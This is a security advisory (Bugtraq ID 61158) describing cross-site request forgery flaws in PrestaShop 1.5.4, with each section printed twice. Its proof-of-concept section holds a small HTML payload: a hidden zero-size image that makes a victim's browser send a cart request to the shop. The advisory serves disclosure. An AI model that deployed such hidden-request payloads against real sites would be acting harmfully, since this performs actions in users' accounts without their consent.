PrestaShop Multiple Cross Site Request Forgery Vulnerabilities
BID:61158
Info
PrestaShop Multiple Cross Site Request Forgery Vulnerabilities
| Bugtraq ID: | 61158 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 11 2013 12:00AM |
| Updated: | Jul 11 2013 12:00AM |
| Credit: | EntPro Cyber Security Research Group |
| Vulnerable: |
PrestaShop PrestaShop 1.5.4 |
| Not Vulnerable: | |
Discussion
PrestaShop Multiple Cross Site Request Forgery Vulnerabilities
PrestaShop is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
PrestaShop 1.5.4 is vulnerable; other versions may also be affected.
PrestaShop is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
PrestaShop 1.5.4 is vulnerable; other versions may also be affected.
Exploit / POC
PrestaShop Multiple Cross Site Request Forgery Vulnerabilities
To exploit these issues an attacker must entice an unsuspecting victim to open a malicious URI.
The following example data is available:
<html>
<head>
<body>
<img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</head>
</html>
To exploit these issues an attacker must entice an unsuspecting victim to open a malicious URI.
The following example data is available:
<html>
<head>
<body>
<img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</head>
</html>
Solution / Fix
PrestaShop Multiple Cross Site Request Forgery Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PrestaShop Multiple Cross Site Request Forgery Vulnerabilities
References:
References:
- PrestaShop Homepage (PrestaShop)